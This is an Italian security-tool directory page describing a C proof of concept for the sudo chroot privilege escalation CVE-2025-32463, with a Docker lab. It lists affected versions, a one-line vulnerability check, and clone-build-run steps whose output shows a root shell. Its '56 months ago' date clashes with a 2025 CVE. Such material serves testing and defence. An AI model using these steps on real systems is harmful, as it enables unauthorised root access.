Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-32463 — Reimplementazione in C del PoC chwoot | Kitploit
Strumenti/GitHubGitHub/vpr-labs/cve-2025-32463
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitPenetration TestingEscape dal ContainerBinary Exploitation
GitHubvpr-labs/cve-2025-32463

CVE-2025-32463

Reimplementazione in C del PoC chwoot

Vedi Repository
56 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Fortemente influenzato/copiato/basato sul formato di un repo simile di pr0v3rbs -- https://github.com/pr0v3rbs/CVE-2025-32463i\_chwoot.git Questa è una reimplementazione in C per consegna, esecuzione e pulizia rapida da un'unica sorgente.

CVE-2025-32463 – privilegio di sudo chroot ("chwoot") PoC

Questo repository fornisce un ambiente minimale e riproducibile per dimostrare la vulnerabilità di escalation dei privilegi CVE‑2025‑32463 nella funzionalità chroot di sudo.

  • Questa vulnerabilità è stata segnalata da Rich Mirch (@0xm1rch su X) @ Stratascale.
  • Post originale: Vulnerability Advisory: Sudo chroot Elevation of Privilege
  • NVD: CVE-2025-32463 (CVSS 9.3)

Versioni Affette

Le build vulnerabili di sudo 1.9.14 fino a 1.9.17 (tutte le p‑revisioni) sulla maggior parte delle distribuzioni Linux sono interessate.

Pagine di Sicurezza

  • Ubuntu (CVSS 9.3)
  • Redhat (CVSS 7.8)
  • SUSE (CVSS 7.8)
  • Debian

Contenuti

FileScopo
DockerfileCrea un'immagine Ubuntu 24.04 con sudo 1.9.16p2 vulnerabile e strumenti di build
sudo‑chwoot.shExploit proof‑of‑concept che avvia una shell root all'interno del chroot
run.sh

Verifica rapida della vulnerabilità

root@kitploit:~
# sudo vulnerabile
poc ~ $ sudo -R woot woot
sudo: woot: No such file or directory

# sudo corretto
poc ~ $ sudo -R woot woot
[sudo] password for poc:
sudo: you are not permitted to use the -R option with woot

Test exploit nel container Docker

root@kitploit:~
# 1 – clona il repo
$ git clone https://github.com/vpr-labs/CVE-2025-32463.git
$ cd CVE-2025-32463

# 2 – build e avvia l'immagine Docker (taggata "vpr-chwoot")
$ ./run.sh

# 3 – esegui l'exploit nel container (esegue il comando root direttamente)
poc@f722d9182d1f:~$ make && ./vpr-chwoot
woot!
root@f722d9182d1f:/# id
uid=0(root) gid=0(root) groups=0(root),1001(poc)
root@f722d9182d1f:/#

run.sh passa --privileged e --rm a Docker in modo che il container si pulisca da solo quando esci.


Pulizia

Rimuovi l'immagine quando hai finito:

root@kitploit:~
docker rmi vpr-chwoot

Riferimenti

  • Nota sulla vulnerabilità Stratascale CRU: Vulnerability Advisory: Sudo chroot Elevation of Privilege
Scarica lo strumento
Script helper che crea l'immagine (se necessario) e avvia il container dell'exploit